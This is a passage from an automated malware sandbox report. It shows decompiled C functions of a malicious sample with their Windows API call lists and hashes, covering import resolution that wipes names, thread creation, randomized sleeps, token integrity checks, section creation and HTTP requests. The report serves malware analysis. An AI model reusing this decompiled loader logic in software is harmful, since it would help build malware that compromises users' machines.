                            • _snwprintf.NTDLL ref: 00CF65F8
                            • CreateFileMappingW.KERNELBASE(000000FF,00CFD2A8,00000004,00000000,00001000,?), ref: 00CF6614
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53), ref: 00CF6626
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00CF663D
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?), ref: 00CF665E
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00CF4F74,?,?,4D283A53), ref: 00CF6666
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: f0f2b2683583c32c368eda5f69587f8f9b217106aa0b14f571868482b008614f
                            • Instruction ID: 319b39dd0f50dc39d02596d2fd77a377100e5cc38a99d6953c6270120aa5fe53
                            • Opcode Fuzzy Hash: f0f2b2683583c32c368eda5f69587f8f9b217106aa0b14f571868482b008614f
                            • Instruction Fuzzy Hash: 1B21D27260020CFBD751ABA4DD46FBE77B9AB44750F200161F715EB2D0EB709A05DB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E100010DC(intOrPtr* _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				signed short _v12;
                            				struct HINSTANCE__* _v16;
                            				intOrPtr _v20;
                            				_Unknown_base(*)()* _v24;
                            				intOrPtr _t34;
                            				intOrPtr _t36;
                            				struct HINSTANCE__* _t37;
                            				intOrPtr _t40;
                            				CHAR* _t44;
                            				_Unknown_base(*)()* _t45;
                            				intOrPtr* _t52;
                            				intOrPtr _t53;
                            				signed short _t54;
                            				intOrPtr* _t57;
                            				signed short _t59;
                            				CHAR* _t60;
                            				CHAR* _t62;
                            				signed short* _t64;
                            				void* _t65;
                            				signed short _t72;
                            
                            				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                            				_v8 = _v8 & 0x00000000;
                            				_t52 = _a4;
                            				if(_t34 == 0) {
                            					L28:
                            					return _v8;
                            				}
                            				_t57 = _t34 + _t52;
                            				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                            				_a4 = _t57;
                            				if(_t36 == 0) {
                            					L27:
                            					goto L28;
                            				}
                            				while(1) {
                            					_t62 = _t36 + _t52;
                            					_t37 = LoadLibraryA(_t62); // executed
                            					_v16 = _t37;
                            					if(_t37 == 0) {
                            						break;
                            					}
                            					_v12 = _v12 & 0x00000000;
                            					memset(_t62, 0, lstrlenA(_t62));
                            					_t53 =  *_t57;
                            					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                            					_t65 = _t65 + 0xc;
                            					if(_t53 != 0) {
                            						L6:
                            						_t64 = _t53 + _t52;
                            						_t54 =  *_t64;
                            						if(_t54 == 0) {
                            							L23:
                            							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                            							_t57 = _t57 + 0x14;
                            							_a4 = _t57;
                            							if(_t36 != 0) {
                            								continue;
                            							}
                            							L26:
                            							goto L27;
                            						}
                            						_v20 = _t40 - _t64 + _t52;
                            						_t72 = _t54;
                            						L8:
                            						L8:
                            						if(_t72 < 0) {
                            							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                            								_t59 = 0;
                            								_v12 =  *_t64 & 0x0000ffff;
                            							} else {
                            								_t59 = _t54;
                            							}
                            						} else {
                            							_t59 = _t54 + _t52;
                            						}
                            						_t20 = _t59 + 2; // 0x2
                            						_t44 = _t20;
                            						if(_t59 == 0) {
                            							_t44 = _v12 & 0x0000ffff;
                            						}
                            						_t45 = GetProcAddress(_v16, _t44);
                            						_v24 = _t45;
                            						if(_t45 == 0) {
                            							goto L21;
                            						}
                            						if(_t59 != 0) {
                            							_t60 = _t59 + 2;
                            							memset(_t60, 0, lstrlenA(_t60));
                            							_t65 = _t65 + 0xc;
                            						}
                            						 *(_v20 + _t64) = _v24;
                            						_t64 =  &(_t64[2]);
                            						_t54 =  *_t64;
                            						if(_t54 != 0) {
                            							goto L8;
                            						} else {
                            							L22:
                            							_t57 = _a4;
                            							goto L23;
                            						}
                            						L21:
                            						_v8 = 0x7f;
                            						goto L22;
                            					}
                            					_t53 = _t40;
                            					if(_t40 == 0) {
                            						goto L23;
                            					}
                            					goto L6;
                            				}
                            				_v8 = 0x7e;
                            				goto L26;
                            			}

                            APIs
                            • LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
                            • lstrlenA.KERNEL32(?), ref: 10001128
                            • memset.NTDLL ref: 10001132
                            • GetProcAddress.KERNEL32(?,00000002), ref: 10001195
                            • lstrlenA.KERNEL32(-00000002), ref: 100011AA
                            • memset.NTDLL ref: 100011B4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: lstrlenmemset$AddressLibraryLoadProc
                            • String ID: ~
                            • API String ID: 1986585659-1707062198
                            • Opcode ID: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
                            • Instruction ID: 36b666a509a82521409ce3d951f77a8f70ef17c10a1a7333a504bd0e8306a4b8
                            • Opcode Fuzzy Hash: 863695ba407b188a3801e1a53bb91d28a8b2d30b78f9075b511b3a0e9345712c
                            • Instruction Fuzzy Hash: C6316F76A01616ABEB18CF59DC90AEEB7F4EF443C0F214069EE05DB244EB30EA45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00CF1000(void* __ecx, void* __edx, intOrPtr _a4) {
                            				struct _FILETIME _v12;
                            				void* _t10;
                            				void* _t12;
                            				int _t14;
                            				signed int _t16;
                            				void* _t18;
                            				signed int _t19;
                            				unsigned int _t23;
                            				void* _t26;
                            				signed int _t33;
                            
                            				_t26 = __edx;
                            				_push(__ecx);
                            				_push(__ecx);
                            				_t10 = HeapCreate(0, 0x400000, 0); // executed
                            				 *0xcfd238 = _t10;
                            				if(_t10 != 0) {
                            					 *0xcfd1a8 = GetTickCount();
                            					_t12 = E00CF9864(_a4);
                            					if(_t12 == 0) {
                            						do {
                            							GetSystemTimeAsFileTime( &_v12);
                            							_t14 = SwitchToThread();
                            							_t23 = _v12.dwHighDateTime;
                            							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                            							_push(0);
                            							_push(9);
                            							_push(_t23 >> 7);
                            							_push(_t16);
                            							L00CFB1A6();
                            							_t33 = _t14 + _t16;
                            							_t18 = E00CF904C(_a4, _t33);
                            							_t19 = 2;
                            							_t25 = _t33;
                            							Sleep(_t19 << _t33); // executed
                            						} while (_t18 == 1);
                            						if(E00CF928F(_t25) != 0) {
                            							 *0xcfd260 = 1; // executed
                            						}
                            						_t12 = E00CF4EE5(_t26); // executed
                            					}
                            				} else {
                            					_t12 = 8;
                            				}
                            				return _t12;
                            			}

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1013
                            • GetTickCount.KERNEL32 ref: 00CF1027
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1043
                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,00CF91B4,?), ref: 00CF1049
                            • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00CF1066
                            • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00CF91B4,?), ref: 00CF1080
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                            • String ID: BbV
                            • API String ID: 507476733-1503427928
                            • Opcode ID: 69fb51001c56edef7c25d2e2b0a8ec3fe0221a7af815f3a371f6588e7a0734cc
                            • Instruction ID: e6b5187cb0821143abdea3f0689dca7511f1522327a4d39d4014c6831ea80096
                            • Opcode Fuzzy Hash: 69fb51001c56edef7c25d2e2b0a8ec3fe0221a7af815f3a371f6588e7a0734cc
                            • Instruction Fuzzy Hash: 9511C272B00208BBE754AB64DC4AF7E3AA8EB44350F140519FA55C6290EEB0D940D653
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF6B7B(long* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void _v16;
                            				long _v20;
                            				int _t33;
                            				void* _t46;
                            
                            				_v16 = 1;
                            				_v20 = 0x2000;
                            				if( *0xcfd25c > 5) {
                            					_v16 = 0;
                            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                            						_v8 = 0;
                            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                            						if(_v8 != 0) {
                            							_t46 = E00CF8D59(_v8);
                            							if(_t46 != 0) {
                            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                            								if(_t33 != 0) {
                            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                            								}
                            								E00CF677C(_t46);
                            							}
                            						}
                            						CloseHandle(_v12);
                            					}
                            				}
                            				 *_a4 = _v20;
                            				return _v16;
                            			}










                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00CF6BAD
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00CF6BCD
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00CF6BDD
                            • CloseHandle.KERNEL32(00000000), ref: 00CF6C2D
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00CF6C00
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00CF6C08
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00CF6C18
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: f72f46053b9d55c9765475969612da51d2953ee4b7a177e860123632095d89e7
                            • Instruction ID: 89c82c5212c600a8cb5cc06596efb243c2522c40595719ae9341411c749cce4a
                            • Opcode Fuzzy Hash: f72f46053b9d55c9765475969612da51d2953ee4b7a177e860123632095d89e7
                            • Instruction Fuzzy Hash: BC213C7590020DFFEB009F94DD84EBEBB79EB48304F1040A6EA51A61A1DB718F05EF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 89%
                            			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                            				struct _SECURITY_ATTRIBUTES* _v8;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				long _t9;
                            				void* _t10;
                            				void* _t18;
                            				void* _t23;
                            				void* _t36;
                            
                            				_push(__ecx);
                            				_t9 = _a8;
                            				_v8 = 1;
                            				if(_t9 == 0) {
                            					_t10 = InterlockedDecrement(0x10004108);
                            					__eflags = _t10;
                            					if(_t10 == 0) {
                            						__eflags =  *0x1000410c;
                            						if( *0x1000410c != 0) {
                            							_t36 = 0x2710;
                            							while(1) {
                            								SleepEx(0x64, 1);
                            								__eflags =  *0x10004118;
                            								if( *0x10004118 == 0) {
                            									break;
                            								}
                            								_t36 = _t36 - 0x64;
                            								__eflags = _t36;
                            								if(_t36 > 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							CloseHandle( *0x1000410c);
                            						}
                            						HeapDestroy( *0x10004110);
                            					}
                            				} else {
                            					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
                            						_t18 = HeapCreate(0, 0x400000, 0); // executed
                            						 *0x10004110 = _t18;
                            						_t41 = _t18;
                            						if(_t18 == 0) {
                            							L6:
                            							_v8 = 0;
                            						} else {
                            							 *0x10004130 = _a4;
                            							asm("lock xadd [eax], ebx");
                            							_t23 = CreateThread(0, 0, E10001C56, E10001561(_a12, 0, 0x10004118, _t41), 0,  &_a8); // executed
                            							 *0x1000410c = _t23;
                            							if(_t23 == 0) {
                            								asm("lock xadd [esi], eax");
                            								goto L6;
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}













                            APIs
                            • InterlockedIncrement.KERNEL32(10004108), ref: 10001D12
                            • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D27
                            • CreateThread.KERNEL32 ref: 10001D5E
                            • InterlockedDecrement.KERNEL32(10004108), ref: 10001D7E
                            • SleepEx.KERNEL32(00000064,00000001), ref: 10001D98
                            • CloseHandle.KERNEL32 ref: 10001DB4
                            • HeapDestroy.KERNEL32 ref: 10001DC0
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                            • String ID:
                            • API String ID: 3416589138-0
                            • Opcode ID: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
                            • Instruction ID: 9498d6db21d119f304d1b5f735a85d01eb658a8925806fa2593c798b6c664c0b
                            • Opcode Fuzzy Hash: 30ac03b81143d665445cde2889a59d55e2a87aaa08a0f6bb701e3aa90fb78cb0
                            • Instruction Fuzzy Hash: 282184B1A01255ABF701DF68CCC89DA77F8EB957E17128526F605D3268DB308D80CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 00CF959C
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00CF961F
                            • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00CF965F
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF9681
                              • Part of subcall function 00CF2CC3: SysAllocString.OLEAUT32(00CFC2A8), ref: 00CF2D13
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 00CF96D4
                            • SysFreeString.OLEAUT32(00000000), ref: 00CF96E3
                              • Part of subcall function 00CF3651: Sleep.KERNELBASE(000001F4), ref: 00CF3699
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                            • String ID:
                            • API String ID: 2118684380-0
                            • Opcode ID: 86e8f1945c379062bad27d83319d332e8f1e33aabf36c03520ce6af06c84c3b8
                            • Instruction ID: 1b9fbe40353788d72ca2aff75f564a19d6ccda3d7948d9ce3887b4635b0276f6
                            • Opcode Fuzzy Hash: 86e8f1945c379062bad27d83319d332e8f1e33aabf36c03520ce6af06c84c3b8
                            • Instruction Fuzzy Hash: 8D512D35500609AFDB81DFA8C844BAEB7B6FF88700B158869F615DB224DB31DD05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E100018E1(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                            				intOrPtr _v8;
                            				_Unknown_base(*)()* _t28;
                            				_Unknown_base(*)()* _t32;
                            				_Unknown_base(*)()* _t35;
                            				_Unknown_base(*)()* _t38;
                            				_Unknown_base(*)()* _t41;
                            				intOrPtr _t44;
                            				struct HINSTANCE__* _t48;
                            				intOrPtr _t54;
                            
                            				_t54 = E10001669(0x20);
                            				if(_t54 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t48 = GetModuleHandleA( *0x10004144 + 0x10005014);
                            					_v8 = 0x7f;
                            					_t28 = GetProcAddress(_t48,  *0x10004144 + 0x1000514c);
                            					 *(_t54 + 0xc) = _t28;
                            					if(_t28 == 0) {
                            						L8:
                            						E10001E78(_t54);
                            					} else {
                            						_t32 = GetProcAddress(_t48,  *0x10004144 + 0x1000515c);
                            						 *(_t54 + 0x10) = _t32;
                            						if(_t32 == 0) {
                            							goto L8;
                            						} else {
                            							_t35 = GetProcAddress(_t48,  *0x10004144 + 0x1000516f);
                            							 *(_t54 + 0x14) = _t35;
                            							if(_t35 == 0) {
                            								goto L8;
                            							} else {
                            								_t38 = GetProcAddress(_t48,  *0x10004144 + 0x10005184);
                            								 *(_t54 + 0x18) = _t38;
                            								if(_t38 == 0) {
                            									goto L8;
                            								} else {
                            									_t41 = GetProcAddress(_t48,  *0x10004144 + 0x1000519a);
                            									 *(_t54 + 0x1c) = _t41;
                            									if(_t41 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                            										_t44 = E10001DD0(_t54, _a8); // executed
                            										_v8 = _t44;
                            										if(_t44 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a12 = _t54;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}













                            APIs
                              • Part of subcall function 10001669: HeapAlloc.KERNEL32(00000000,?,10001C8C,00000208,?,00000000,?,?,?,10001A31,?), ref: 10001675
                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10001928
                            • GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10001954
                            • GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
                            • GetProcAddress.KERNEL32(00000000,?), ref: 10001980
                              • Part of subcall function 10001DD0: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 10001E2D
                              • Part of subcall function 10001DD0: memset.NTDLL ref: 10001E4F
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 1632424568-0
                            • Opcode ID: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
                            • Instruction ID: 07b4c9ead737c097f440b77457025fa1314e9054e8ebb6748a7bdb02948612b8
                            • Opcode Fuzzy Hash: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
                            • Instruction Fuzzy Hash: 51213BB160071AAFE710DF69CD90E9BB7ECEF943C5B024166E944C7219EB70E9048BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00CF8CE0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                            				void* __esi;
                            				long _t10;
                            				void* _t18;
                            				void* _t22;
                            
                            				_t9 = __eax;
                            				_t22 = __eax;
                            				if(_a4 != 0 && E00CF552D(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                            					L9:
                            					return GetLastError();
                            				}
                            				_t10 = E00CFA934(_t9, _t18, _t22, _a8); // executed
                            				if(_t10 == 0) {
                            					ResetEvent( *(_t22 + 0x1c));
                            					ResetEvent( *(_t22 + 0x20));
                            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                            						SetEvent( *(_t22 + 0x1c));
                            						goto L7;
                            					} else {
                            						_t10 = GetLastError();
                            						if(_t10 == 0x3e5) {
                            							L7:
                            							_t10 = 0;
                            						}
                            					}
                            				}
                            				if(_t10 == 0xffffffff) {
                            					goto L9;
                            				}
                            				return _t10;
                            			}








                            APIs
                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CF8D1A
                            • ResetEvent.KERNEL32(?), ref: 00CF8D1F
                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00CF8D2C
                            • GetLastError.KERNEL32 ref: 00CF8D37
                            • GetLastError.KERNEL32(?,?,00000102,00CF3331,?,?,00000000,00000000), ref: 00CF8D52
                              • Part of subcall function 00CF552D: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?,?,00000000), ref: 00CF5539
                              • Part of subcall function 00CF552D: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00CF8CFF,?,?,?,?,00000102,00CF3331,?), ref: 00CF5597
                              • Part of subcall function 00CF552D: lstrcpy.KERNEL32(00000000,00000000), ref: 00CF55A7
                            • SetEvent.KERNEL32(?), ref: 00CF8D45
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3739416942-0
                            • Opcode ID: 1356c19d939e026ffbf8247557d3ee0bbe5f2e11fee8f528d69b22f9f3983310
                            • Instruction ID: 55af6f0c895d6be60c9afe7abe52a1aeb074d7b2010434efc70e035534c43e51
                            • Opcode Fuzzy Hash: 1356c19d939e026ffbf8247557d3ee0bbe5f2e11fee8f528d69b22f9f3983310
                            • Instruction Fuzzy Hash: 6F01623110020AABD6706B61DD44F7BBAA9AF64364F214A25F761D50F0DB21D909DA23
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 57%
                            			E00CF4EE5(signed int __edx) {
                            				signed int _v8;
                            				long _v12;
                            				CHAR* _v16;
                            				long _v20;
                            				void* __edi;
                            				void* __esi;
                            				void* _t21;
                            				CHAR* _t22;
                            				CHAR* _t25;
                            				intOrPtr _t26;
                            				void* _t27;
                            				void* _t31;
                            				void* _t32;
                            				CHAR* _t36;
                            				CHAR* _t43;
                            				CHAR* _t44;
                            				CHAR* _t46;
                            				void* _t49;
                            				void* _t51;
                            				CHAR* _t54;
                            				signed char _t56;
                            				intOrPtr _t58;
                            				signed int _t59;
                            				void* _t62;
                            				CHAR* _t65;
                            				CHAR* _t66;
                            				char* _t67;
                            				void* _t68;
                            
                            				_t61 = __edx;
                            				_v20 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				_t21 = E00CF54ED();
                            				if(_t21 != 0) {
                            					_t59 =  *0xcfd25c; // 0x2000000a
                            					_t55 = (_t59 & 0xf0000000) + _t21;
                            					 *0xcfd25c = (_t59 & 0xf0000000) + _t21;
                            				}
                            				_t22 =  *0xcfd164(0, 2); // executed
                            				_v16 = _t22;
                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                            					_t25 = E00CF3496( &_v8,  &_v20); // executed
                            					_t54 = _t25;
                            					_t26 =  *0xcfd2a4; // 0x247a5a8
                            					if( *0xcfd25c > 5) {
                            						_t8 = _t26 + 0xcfe5cd; // 0x4d283a53
                            						_t27 = _t8;
                            					} else {
                            						_t7 = _t26 + 0xcfea15; // 0x44283a44
                            						_t27 = _t7;
                            					}
                            					E00CF61FB(_t27, _t27);
                            					_t31 = E00CF65B1(_t61,  &_v20,  &_v12); // executed
                            					if(_t31 == 0) {
                            						CloseHandle(_v20);
                            					}
                            					_t62 = 5;
                            					if(_t54 != _t62) {
                            						 *0xcfd270 =  *0xcfd270 ^ 0x81bbe65d;
                            						_t32 = E00CF8D59(0x60);
                            						 *0xcfd324 = _t32;
                            						__eflags = _t32;
                            						if(_t32 == 0) {
                            							_push(8);
                            							_pop(0);
                            						} else {
                            							memset(_t32, 0, 0x60);
                            							_t49 =  *0xcfd324; // 0x31795b0
                            							_t68 = _t68 + 0xc;
                            							__imp__(_t49 + 0x40);
                            							_t51 =  *0xcfd324; // 0x31795b0
                            							 *_t51 = 0xcfe836;
                            						}
                            						_t54 = 0;
                            						__eflags = 0;
                            						if(0 == 0) {
                            							_t36 = RtlAllocateHeap( *0xcfd238, 0, 0x43);
                            							 *0xcfd2c4 = _t36;
                            							__eflags = _t36;
                            							if(_t36 == 0) {
                            								_push(8);
                            								_pop(0);
                            							} else {
                            								_t56 =  *0xcfd25c; // 0x2000000a
                            								_t61 = _t56 & 0x000000ff;
                            								_t58 =  *0xcfd2a4; // 0x247a5a8
                            								_t13 = _t58 + 0xcfe55a; // 0x697a6f4d
                            								_t55 = _t13;
                            								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xcfc29f);
                            							}
                            							_t54 = 0;
                            							__eflags = 0;
                            							if(0 == 0) {
                            								asm("sbb eax, eax");
                            								E00CF5DC6( ~_v8 &  *0xcfd270, 0xcfd00c); // executed
                            								_t54 = E00CF2E55(_t55);
                            								__eflags = _t54;
                            								if(_t54 != 0) {
                            									goto L30;
                            								}
                            								_t43 = E00CF5672(_t55); // executed
                            								__eflags = _t43;
                            								if(_t43 != 0) {
                            									__eflags = _v8;
                            									_t65 = _v12;
                            									if(_v8 != 0) {
                            										L29:
                            										_t44 = E00CF27F7(_t61, _t65, _v8); // executed
                            										_t54 = _t44;
                            										goto L30;
                            									}
                            									__eflags = _t65;
                            									if(__eflags == 0) {
                            										goto L30;
                            									}
                            									_t46 = E00CF4A32(__eflags,  &(_t65[4])); // executed
                            									_t54 = _t46;
                            									__eflags = _t54;
                            									if(_t54 == 0) {
                            										goto L30;
                            									}
                            									goto L29;
                            								}
                            								_t54 = 8;
                            							}
                            						}
                            					} else {
                            						_t66 = _v12;
                            						if(_t66 == 0) {
                            							L30:
                            							if(_v16 == 0 || _v16 == 1) {
                            								 *0xcfd160();
                            							}
                            							goto L34;
                            						}
                            						_t67 =  &(_t66[4]);
                            						do {
                            						} while (E00CF66F6(_t62, _t67, 0, 1) == 0x4c7);
                            					}
                            					goto L30;
                            				} else {
                            					_t54 = _t22;
                            					L34:
                            					return _t54;
                            				}
                            			}































                            APIs
                              • Part of subcall function 00CF54ED: GetModuleHandleA.KERNEL32(4C44544E,00000000,00CF4EFE,00000000,00000000), ref: 00CF54FC
                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00CF4F7B
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • memset.NTDLL ref: 00CF4FCA
                            • RtlInitializeCriticalSection.NTDLL(03179570), ref: 00CF4FDB
                              • Part of subcall function 00CF4A32: memset.NTDLL ref: 00CF4A47
                              • Part of subcall function 00CF4A32: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00CF4A7B
                              • Part of subcall function 00CF4A32: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00CF4A86
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00CF5006
                            • wsprintfA.USER32 ref: 00CF5036
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
